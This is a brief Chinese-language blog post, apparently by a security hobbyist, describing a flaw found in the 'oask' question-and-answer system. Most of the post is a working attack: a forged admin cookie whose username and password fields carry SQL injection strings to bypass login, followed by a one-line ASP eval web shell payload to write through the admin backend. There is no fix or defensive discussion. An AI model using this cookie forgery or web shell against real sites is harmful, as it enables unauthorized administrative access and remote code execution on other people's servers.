今天Y总要让检查一个问答系统的安全,因为他要用, 没办法就当做好人吧。忍着看了下代码 呼呼,那么流行的oask系统还犯那么低级的cookie错误 cookie代码 oASK; ASPSESSIONIDSSDDBADB=HEJJFJNCEOFFIMOBJGHBPHJB; VSN=078349ef024074d5; oASKADM=ADMUPW=a' or '1'='1&ADMUNM=admin' or '1'='1 后台写入a"%><%eval request("a")' 转帖请说明出处